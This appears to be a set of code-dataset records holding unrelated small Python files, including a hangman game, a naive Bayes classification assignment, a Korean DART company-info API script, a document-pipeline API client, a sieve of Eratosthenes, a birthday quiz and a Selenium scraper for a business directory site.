self.game(5)\n else:\n print('There no such level, type again!')\n self.levels()\n\n # star game function\n def start_game(self):\n start = input('Do sure you want start the game and save The World? There will be no return...(enter \"yes\" to continue) ').lower()\n if start == 'yes' or start == 'y':\n self.levels()\n else:\n sys.exit()\n\n def main(self):\n os.system('clear')\n print('\\033[93m' + 'Evil ' + '\\033[91m' + 'SKYNET' + '\\033[93m' + ''' is trying to take control over the world.\n Guess a names of European capital that are his targets and safe the world!\\n''' + '\\033[0m')\n self.make_capitals()\n self.make_dashes()\n self.start_game()\n self.levels\n\nnew_game = HangMan()\nnew_game.main()\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"421991313","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nDownload and install sklearn on your computer (e.g. download the Anaconda distribution) or \nuse a Jupyter notebook on Google Colab (free).\n Download the sample dataset assigData4.csv. This file has 1200 positive and 6000 negative samples. Each sample 215 features \n (assume the first feature is “feature 1” below). The final value on each line of the file is the class (1 = positive, \n 0 = negative) of that sample. These data represent features extracted from genomic windows that do (positive) and do not (negative) \n correspond to microRNA. Use Weka to do the following:\na) Data visualization:\ni. Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n Suggest you use the pandas library for this.\nii. Plot the distribution of feature 15 for the two classes on a single histogram. The seaborn library may be useful here.\niii. Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class. Again,\n the seaborn library is useful here.\nb) Preprocessing: sklearn implements several filter type (i.e. not wrapper type) feature selection methods.\ni. Describe the SelectKBest approach using the chi metric. (~50 words, don’t just copy)\nii. Run a different filter-type feature selection approach on your data (i.e. other than SelectKBest with chi).\niii.\n i. Briefly describe which and what parameters you used.\n ii. Summarize the results: how many features were selected and which features selected? If your method simply returns \n a ranked list of all 215 features, choose a subset by applying an arbitrary cutoff score to the ranked list. Describe \n your approach.\nc) Classification: using a naïve Bayes classifier:\ni. Which parameters must be set by the user (briefly describe their meaning)\nii. When creating a hold-out test set, what is stratified sampling and how is it applicable here? (~20 words)\niii. For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \nthe confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \nGenerate a ROC curve and a precision-recall curve.\niv. Repeat iii using your optimal feature set from b-iii) above.\nv. Which feature set led to the best performance? (discuss difference in observed performance metrics; ~50 words)\n\"\"\"\nimport sklearn as sk\nimport pandas as pa\nimport seaborn as se\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectPercentile, f_classif\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.naive_bayes import GaussianNB\nfrom train import get_train\nfrom get_accuracy import get_accuracy\n\n# Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n\nnames = []\nfor i in range(1,216):\n name = \"feature\" + str(i)\n names.append(name)\nnames.append('classes')\ndata = pa.read_csv('assigData4.csv',names = names)\n\n# Plot the distribution of feature 15 for the two classes on a single histogram.\n\nfeature15class0 = []\nfor j in range(0,7200):\n if data.classes[j] == 0:\n feature15class0.append(data.feature15[j])\nse.distplot(feature15class0, bins = 50, kde = False, label = \"class=0\")\nplt.legend()\nfeature15class1 = []\nfor k in range(0, 7200):\n if data.classes[k] == 1:\n feature15class1.append(data.feature15[k])\nse.distplot(feature15class1, color = 'red', bins = 50, kde = False, label = \"class=1\")\nplt.legend()\n\n# Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class\n\nplt.figure()\nse.scatterplot(x = \"feature3\", y = \"feature8\", data = data,hue='classes')\n\n#I use the SelectPercentile with f_classif method, which use chi2 , and then choose the features of\n#the highest percentile of the scores. the parameter : score_func=, percentile\n\nY = pa.Series(data.classes).values\ndataupdate = data.drop(columns = 'classes')\nX = dataupdate.values\nX_new = SelectPercentile(f_classif, percentile = 70)\nX_new.fit_transform(X,Y)\nselectedfeatureindices = X_new.get_support(indices = True)\na=[]\nfor l in list(range(len(selectedfeatureindices))):\n b = (\"feature\" + str(selectedfeatureindices[l] + 1))\n a.append(b)\nprint(a)\n\"\"\"I select 150 features, 'feature1', 'feature2', 'feature3', 'feature4', 'feature5',\n'feature6', 'feature7', 'feature8', 'feature9', 'feature10', 'feature11', 'feature12',\n'feature13', 'feature14', 'feature15', 'feature16', 'feature17', 'feature18', 'feature19',\n'feature20', 'feature21', 'feature22', 'feature23', 'feature24', 'feature25', 'feature26',\n'feature27', 'feature28', 'feature31', 'feature32', 'feature33', 'feature34', 'feature35',\n'feature36', 'feature37', 'feature38', 'feature39','feature40', 'feature41', 'feature42',\n'feature43', 'feature44', 'feature45', 'feature47', 'feature49', 'feature54', 'feature55',\n'feature56', 'feature59', 'feature60', 'feature61', 'feature65', 'feature66', 'feature67',\n'feature68', 'feature69', 'feature70', 'feature71', 'feature72', 'feature73', 'feature74',\n'feature75', 'feature76', 'feature77', 'feature78', 'feature79', 'feature80', 'feature84',\n'feature85', 'feature89', 'feature90', 'feature91', 'feature93', 'feature95', 'feature96',\n'feature97', 'feature98', 'feature99', 'feature100', 'feature103', 'feature104', 'feature105',\n'feature106', 'feature108', 'feature109', 'feature110', 'feature112', 'feature116', 'feature119',\n'feature120', 'feature121', 'feature122', 'feature123', 'feature124', 'feature126', 'feature129',\n'feature132', 'feature136', 'feature137', 'feature138', 'feature139', 'feature140', 'feature142',\n'feature143', 'feature145', 'feature146', 'feature147', 'feature148', 'feature149', 'feature150',\n'feature151', 'feature154', 'feature155', 'feature156', 'feature157', 'feature159', 'feature161',\n'feature162', 'feature163', 'feature164', 'feature165', 'feature167', 'feature169', 'feature170',\n'feature171', 'feature172', 'feature173', 'feature174', 'feature175', 'feature178', 'feature179',\n'feature180', 'feature182', 'feature184', 'feature185', 'feature194', 'feature196', 'feature197',\n'feature200', 'feature201', 'feature202', 'feature203', 'feature204', 'feature209', 'feature210',\n'feature211', 'feature212', 'feature213', 'feature214', 'feature215'.\"\"\"\n\n# For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \n# the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \n# Generate a ROC curve and a precision-recall curve.\n\ndataarray = dataupdate.values\nclassarray = data.classes.values\nc = sk.model_selection.StratifiedShuffleSplit(n_splits = 1, test_size = 0.2)\nfor train_index, test_index in c.split(dataarray, classarray):\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\nX_train, X_test = dataarray[train_index], dataarray[test_index]\ny_train, y_test = classarray[train_index], classarray[test_index]\ngnb = GaussianNB()\ngnb.fit(X_train, y_train)\nscore = gnb.predict_proba(X_train)[:, 1]\ny_pred = sk.model_selection.cross_val_predict(gnb,X_train, y_train, groups = None, cv = 5, verbose = 2)\nconfusionmatrix = sk.metrics.confusion_matrix(y_train, y_pred)\nTP = confusionmatrix[1,1]\nFP = confusionmatrix[0,1]\nFN = confusionmatrix[1,0]\nTN = confusionmatrix[0,0]\nprint(\"confusion matrix is \",([TP,FP],[FN,TN]))\ntrainaccuracy, trainprecision, trainsensitivity, trainspecificity = get_train(TP, FP, TN, FN)\nprint(\"the accuracy is\", trainaccuracy)\nprint(\"the precision is\", trainprecision)\nprint(\"the sensitivity is\", trainsensitivity)\nprint(\"the trainspecificity is\", trainspecificity)\nfpr, tpr, thresholds = sk.metrics.roc_curve(y_train, score)\nplt.figure()\nplt.scatter(fpr,tpr)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPR\")\nplt.ylabel(\"trainTPR\")\nplt.show()\ny_score = gnb.predict_proba(X_train)\nprecision, recall, threshold = sk.metrics.precision_recall_curve(y_train,y_score[:,1])\nplt.figure()\nplt.plot(recall, precision)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecall')\nplt.ylabel('trainprecision')\nplt.show()\n\n#For the optimal feature set : Conduct a 5-fold cross-validation test. Provide \n#the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \n#Generate a ROC curve and a precision-recall curve.\n\ndataarraynew=data[a].values\nclassarraynew=data.classes.values\ns = sk.model_selection.StratifiedShuffleSplit(n_splits=1, test_size=0.2)\nfor train_indexnew, test_indexnew in s.split(dataarraynew, classarraynew):\n print(\"TRAIN:\", train_indexnew, \"TEST:\", test_indexnew)\nX_trainnew, X_testnew = dataarraynew[train_indexnew], dataarraynew[test_indexnew]\ny_trainnew, y_testnew = classarraynew[train_indexnew], classarraynew[test_indexnew]\ngnbnew = GaussianNB()\ngnbnew.fit(X_trainnew,y_trainnew)\nscorenew = gnbnew.predict_proba(X_trainnew)[:, 1]\ny_prednew = sk.model_selection.cross_val_predict(gnbnew,X_trainnew, y_trainnew, groups=None, cv=5, verbose=2)\nconfusionmatrixnew = sk.metrics.confusion_matrix(y_trainnew, y_prednew)\nTPnew = confusionmatrixnew[1,1]\nFPnew = confusionmatrixnew[0,1]\nFNnew = confusionmatrixnew[1,0]\nTNnew = confusionmatrixnew[0,0]\nprint(\"confusion matrix is \",([TPnew,FPnew],[FNnew,TNnew]))\ntrainaccuracynew,trainprecisionew, trainsensitivitynew, trainspecificitynew = get_train(TPnew, FPnew, TNnew, FNnew)\nprint(\"the accuracy is\",trainaccuracynew)\nprint(\"the precision is\",trainprecisionew)\nprint(\"the sensitivity is\",trainsensitivitynew)\nprint(\"the trainspecificity is\",trainspecificitynew)\nfprnew, tprnew, thresholdsnew = sk.metrics.roc_curve(y_trainnew, scorenew)\nplt.figure()\nplt.scatter(fprnew,tprnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPRnew\")\nplt.ylabel(\"trainTPRnew\")\nplt.show()\ny_scorenew = gnbnew.predict_proba(X_trainnew)\nprecisionnew, recallnew, thresholdnew = sk.metrics.precision_recall_curve(y_trainnew, y_scorenew[:,1])\nplt.figure()\nplt.plot(recallnew, precisionnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecallnew')\nplt.ylabel('trainprecisionnew')\nplt.show()\n\n# get the accuracy of different dataset\nytrainaccuracy = get_accuracy(gnb, X_train, y_train)\nprint(\"the accuracy on the train set of the original data is\",ytrainaccuracy)\nytrainnewaccuracy = get_accuracy(gnbnew, X_trainnew, y_trainnew)\nprint(\"the accuracy on the train set of the selecting data is\",ytrainnewaccuracy)\nytestaccuracy = get_accuracy(gnb, X_test, y_test)\nprint(\"the accuracy on the test set of the original data is\",ytestaccuracy)\nytestnewaccuracy = get_accuracy(gnbnew, X_testnew, y_testnew)\nprint(\"the accuracy on the test set of the selecting data is\",ytestnewaccuracy)\n","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"165492633","text":"macos= int(input(\"Quantos cigarros por dia? \"))\n\ntempo= int(input(\"Quantos anos fuma? \"))\n\n#1 cigarro 10min de vida #1 dia= 24*60 min\n\ndef perdido (macos,tempo):\n m=macos*10*365*tempo #minutos perdidos nos anos de fumo\n dia= m/(24*60)\n return dia\n\nvida= perdido(macos,tempo)\n\nprint(\"Tempo perdido: {0} dias\".format(vida))","sub_path":"backup/user_314/ch22_2020_09_02_19_56_54_169012.py","file_name":"ch22_2020_09_02_19_56_54_169012.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"378001094","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 종목코드를 고유변호로 변환 (함수 정의)\ndef get_code(stock_code): \n # 고유번호 리스트 파일 불러오기 \n XML_PATH = \"./data/CORPCODE.xml\"\n infile = open(XML_PATH,\"r\", encoding='utf-8')\n code_xml = infile.read()\n soup_xml = BeautifulSoup(code_xml,'html.parser')\n\n # 종목코드를 찾고, 고유번호를 추출\n items = soup_xml.find_all('list') \n for item in items:\n scode = item.find('stock_code').text\n if str(scode)==str(stock_code):\n corp_code = item.find('corp_code').text\n print('고유번호: %s' % corp_code)\n return corp_code\n \n print('Failed to get the proper code...') \n return None\n\n# Open DART 접속\nif __name__==\"__main__\":\n\n # DART 전자공시 사이트 APT 인증키 입력\n my_auth_key = \"---발급받은 개인 키를 입력하세요---\" \n \n # 기업개황 정보 접속 URL\n crp_cd = get_code(\"005380\")\n url = \"https://opendart.fss.or.kr/api/company.xml?crtfc_key=\"+my_auth_key+\"&corp_code=\"+crp_cd\n\n # BeautifulSoup으로 API가 반환하는 XML 해석하여 dataframe으로 정리\n xml = requests.get(url)\n soup = BeautifulSoup(xml.text, 'html.parser') \n\n corp_name = soup.find('corp_name').text\n corp_name_eng = soup.find('corp_name_eng').text\n stock_name = soup.find('stock_name').text\n stock_code = soup.find('stock_code').text\n ceo_nm = soup.find('ceo_nm').text\n corp_cls = soup.find('corp_cls').text\n jurir_no = soup.find('jurir_no').text\n bizr_no = soup.find('bizr_no').text\n adres = soup.find('adres').text\n hm_url = soup.find('hm_url').text\n ir_url = soup.find('ir_url').text\n phn_no = soup.find('phn_no').text\n fax_no = soup.find('fax_no').text\n induty_code = soup.find('induty_code').text\n est_dt = soup.find('est_dt').text\n acc_mt = soup.find('acc_mt').text\n \n company_info = {'corp_name':corp_name,\n 'corp_name_eng':corp_name_eng,\n 'stock_name':stock_name,\n 'stock_code':stock_code,\n 'ceo_nm':ceo_nm,\n 'corp_cls':corp_cls,\n 'jurir_no':jurir_no,\n 'bizr_no':bizr_no,\n 'adres':adres,\n 'hm_url':hm_url,\n 'ir_url':ir_url,\n 'phn_no':phn_no,\n 'fax_no':fax_no,\n 'induty_code':induty_code,\n 'est_dt':est_dt,\n 'acc_mt':acc_mt, \n }\n\nprint(company_info)","sub_path":"5674-849/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"94525764","text":"import time\nimport requests\nimport json\nimport os\nimport logging\n\nfrom xpmsrequests.data import DataVariables\nfrom xpmsrequests.rangerrequests import requestsrangerbase\n\nclass RangerReq(requestsrangerbase.RangerBase):\n TempDocID = ''\n def __init__(self):\n # Create the Logger\n super(RangerReq,self).__init__()\n self.logger = logging.getLogger(__name__)\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def getDataByJobId(self,JobId):\n self.logger.info('Into getDataByJobId method')\n jobIdUrl = DataVariables.RangerJobIdUrl+JobId\n self.logger.info('JobIdUrl is :'+jobIdUrl)\n status = 'in-progress'\n processStatus = 'process_status'\n\n try:\n count = 1\n while (count <= DataVariables.TimeOut):\n tempJson = requests.get(jobIdUrl).json()\n if(count > DataVariables.TimeOut):\n self.logger.error('Time Count Exceeded')\n return None\n if (tempJson[processStatus] != status):\n print('Exited while')\n self.logger.info('Returning Json :'+str(tempJson))\n return tempJson\n if (tempJson[processStatus] == status):\n self.logger.info('Into Sleep')\n self.logger.info('Sleep Time is : '+str(DataVariables.PollTime))\n time.sleep(DataVariables.PollTime)\n count += 1\n self.logger.info('count is :'+str(count))\n except:\n print('Unable to generate response')\n self.logger.error('Unable to generate response')\n\n\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def upLoadReq(self, imgUrl):\n\n self.logger.info('Into upLoadReq method')\n files = {'file': open(imgUrl, 'rb')}\n # self.logger.info('file is:'+str(files))\n response = requests.post(DataVariables.RangerUploadURL, files=files)\n self.logger.info('Response Json after uploading image is' + str(response.json()))\n if (response.status_code == 200):\n self.logger.info(\n 'Status of Response returned after uploading the image is ' + str(response.status_code))\n return response.json()\n else:\n self.logger.error(\n 'Status of Response returned after uploading the image is' + str(response.status_code))\n return None\n\n # *****************************************************************************************************\n\n def insightIngest(self, uploadjson):\n self.logger.info('Into Insight Ingest method')\n jsonFileData = self.getJsonFileData(DataVariables.Insightingestjson)\n self.logger.info('The body Of insight Ingest Json Is :' + str(jsonFileData))\n jsonFileData['data']['file_path'][0] = uploadjson['metadata']['file_path']\n jsonFileData['data']['request_type'] = 'ingest_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight Ingest json after assigning metadata of Upload json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n ingestFileJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightIngest is :' + str(ingestFileJobID))\n return ingestFileJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentMetadata(self,injestInsightJson):\n self.logger.info('Into insightExtractDocumentMetadata method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of Getinsight Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = injestInsightJson['result']['metadata']['insights'][0]['insight']['doc_id']\n RangerReq.TempDocID = jsonFileData['data']['doc_id']\n print('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$',jsonFileData['data']['doc_id'])\n self.logger.info('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$'+ str(jsonFileData['data']['doc_id']))\n jsonFileData['data']['request_type'] = 'extract_document_metadata'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of InsightIngest json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentMetadataJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightExtractDocumentMetadata is :' + str(insightExtractDocumentMetadataJobID))\n return insightExtractDocumentMetadataJobID\n\n # *****************************************************************************************************\n\n def insightConvertDocument(self,insightExtractDocumentMetadataJson):\n self.logger.info('Into insightConvertDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = insightExtractDocumentMetadataJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'convert_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentMetadata json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightConvertDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ConvertDocumentJobID is :' + str(insightConvertDocumentJobID))\n return insightConvertDocumentJobID\n\n # *****************************************************************************************************\n\n def insightClassifyDocument(self,insightConvertDocumentJson):\n self.logger.info('Into insightClassifyDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightConvertDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'classify_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ConvertDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightClassifyDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ClassifyDocumentJobID is :' + str(insightClassifyDocumentJobID))\n return insightClassifyDocumentJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentElements(self,insightClassifyDocumentJson):\n self.logger.info('Into insightExtractDocumentElements method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightClassifyDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_elements'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ClassifyDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentElementsJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentElementsJobID))\n return insightExtractDocumentElementsJobID\n\n # *****************************************************************************************************\n def insightExtractDocumentText(self,insightExtractDocumentElementsJson):\n self.logger.info('Into insightExtractDocumentText method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightExtractDocumentElementsJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_text'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentElements json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentTextJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentTextJobID))\n return insightExtractDocumentTextJobID\n\n","sub_path":"xpmsrequests/rangerrequests/requestsranger.py","file_name":"requestsranger.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"396585292","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/webmpris/urls.py\n# Compiled at: 2013-11-14 22:46:20\nfrom django.conf.urls import patterns, url\nfrom webmpris.views import Root, Player, TrackList, Playlists\nOBJ_MAP = {'Root': Root, 'Player': Player, \n 'TrackList': TrackList, \n 'Playlists': Playlists}\nurlpatterns = patterns('webmpris.views', url('^players$', 'get_players', name='players'))\nfor name, obj in OBJ_MAP.items():\n url_prop = ('^players/(?P:[\\\\w.]+)/{name}$').format(name=name)\n url_meth = url_prop[:-1] + '/(?P[\\\\w]+$)'\n urlpatterns += patterns('', url(url_prop, obj.as_view()), url(url_meth, obj.as_view()))","sub_path":"pycfiles/webmpris-1.1-py2.7/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"574126520","text":"# return a list ret that contains all prime numbers <= N\ndef sieve_algorithm(N):\n myList = [True] * (N+1);\n\n for i in range(2,N+1):\n if myList[i]==True:\n j=2;\n while j*i<=N:\n myList[j*i] = False\n j+=1\n\n ret = []\n for i in range(2,N+1):\n if(myList[i]):\n ret.append(i)\n\n return ret\n\nprint(sieve_algorithm(11))\n","sub_path":"sieve.py","file_name":"sieve.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"260000945","text":"\"\"\"\nbirthday.py\nAuthor: Esther Hacker\nCredit: N/A\nAssignment: Birthday Problem\n\nYour program will ask the user the following questions, in this order:\n\n1. Their name.\n2. The name of the month they were born in (e.g. \"September\").\n3. The year they were born in (e.g. \"1962\").\n4. The day they were born on (e.g. \"11\").\n\nIf the user's birthday fell on October 31, then respond with:\n\n You were born on Halloween!\n\nIf the user's birthday fell on today's date, then respond with:\n\n Happy birthday!\n\nOtherwise respond with a statement like this:\n\n Peter, you are a winter baby of the nineties.\n\nExample Session\n\n Hello, what is your name? Eric\n Hi Eric, what was the name of the month you were born in? September\n And what year were you born in, Eric? 1972\n And the day? 11\n Eric, you are a fall baby of the stone age.\n\"\"\"\nfrom datetime import datetime\nfrom calendar import month_name\ntodaymonth = datetime.today().month\ntodaydate = int(datetime.today().day)\ntodayyear = int(datetime.today().year)\n\ntodaymonthname = month_name[todaymonth].lower()\n\nname = input(\"Hello, what is your name? \")\nmonth = input(\"Hi \" + name + \", what is the name of the month you were born in? \")\nmonth = month.lower()\nday = int(input(\"And what day of the month were you born on, \" + name + \"? \"))\nyear = int(input(\"And the year? \"))\n\nif month == \"october\" and day == 31:\n print(\"You were born on Halloween!\")\n \nelse:\n if month == todaymonthname and day == todaydate:\n print(\"Happy birthday!\")\n\n else:\n if month == \"december\" or month == \"january\" or month == \"february\":\n season = \"winter\"\n \n if month == \"march\" or month == \"april\" or month == \"may\":\n season = \"spring\"\n \n if month == \"june\" or month == \"july\" or month == \"august\":\n season = \"summer\"\n \n if month == \"september\" or month == \"october\" or month == \"november\":\n season = \"fall\"\n \n if year in range(1980, 1990):\n decade = \"eighties\"\n \n if year in range(1990, 2000):\n decade = \"nineties\"\n \n if year in range(2000, todayyear):\n decade = \"two thousands\"\n \n if year not in range(1980, todayyear):\n decade = \"stone age\"\n \n print(name + \", you are a \" + season + \" baby of the \" + decade + \".\")\n","sub_path":"birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"206420513","text":"import logging\nimport time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium import webdriver\nfrom lxml import etree\nimport pymongo\n\nclass Selenium():\n def __init__(self, timeout=None):\n self.logger = logging.getLogger(__name__)\n self.timeout = 20\n self.browser = webdriver.Chrome()\n # self.browser.set_window_size(1400, 700)\n self.browser.set_page_load_timeout(self.timeout)\n self.wait = WebDriverWait(self.browser, self.timeout)\n self.client = pymongo.MongoClient('localhost')\n self.db = self.client['new_hc']\n\n def __del__(self):\n self.browser.close()\n\n def process(self,url,tag):\n self.logger.debug('Chrome is Starting')\n try:\n self.browser.get(url)\n time.sleep(0.5)\n # ActionChains(self.browser).send_keys(Keys.DOWN).perform()\n try:\n js = \"var q=document.documentElement.scrollTop=500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1200\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1800\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=2500\"\n self.browser.execute_script(js)\n time.sleep(1)\n js = \"var q=document.documentElement.scrollTop=3200\"\n self.browser.execute_script(js)\n time.sleep(1)\n js = \"var q=document.documentElement.scrollTop=3700\"\n self.browser.execute_script(js)\n time.sleep(1)\n except:\n js = \"var q=document.documentElement.scrollTop=500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1000\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=2300\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=3500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=4000\"\n self.browser.execute_script(js)\n self.parse_detail(self.browser.page_source,tag)\n except TimeoutException:\n ActionChains(self.browser).send_keys(Keys.F5).perform()\n time.sleep(1)\n return self.process(url,tag)\n return self.browser\n\n def parse_detail(self, response,tag):\n # print(response.url)\n # item = response.meta['item']\n doc = etree.HTML(response)\n urls = doc.xpath(\"//div[@class='picmid pRel']\")\n print(len(urls))\n for url in urls:\n sub_url = url.xpath(\"./a/@href\")[0]\n # print(sub_url)\n if 'http' in sub_url:\n continue\n sub_url = 'https:' + sub_url\n item = {'link':sub_url,'tag': tag}\n if self.db['link'].update({'link':sub_url},{'$set': item},True):\n print('成功保存到mongo',tag,sub_url)\n else:\n print('No Mongo')\n # # yield item\n # yield scrapy.Request(sub_url, callback=self.parse_sh, dont_filter=True)\n page = doc.xpath(\"//span[@class='page_next page-n']/a[@title='下一页']/@href\")\n if page:\n next_page = 'https:' + page[0]\n print('当前页', next_page, '-------------')\n return self.process(next_page,tag)\n # yield scrapy.Request(next_page,callback=self.parse_detail,dont_filter=True)\n else:\n print(\"页面枯竭\")\n pass\n\n def run(self):\n # print(self.db.get_collection('hc').find({}).count())\n for url in self.db.get_collection('link').find({}):\n print(url)\n self.process(url['big_link'],url['tag'])\n # self.parse_detail(html)\n\nif __name__ == '__main__':\n hc = Selenium()\n hc.run()\n\n\n\n# import requests\n# import pymongo\n# from lxml import etree\n# client = pymongo.MongoClient('localhost')\n# db = client['new_hc']\n# headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n# response = requests.get(\"http://www.js.hc360.com/\",headers=headers)\n\n","sub_path":"hc_selenium.py","file_name":"hc_selenium.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
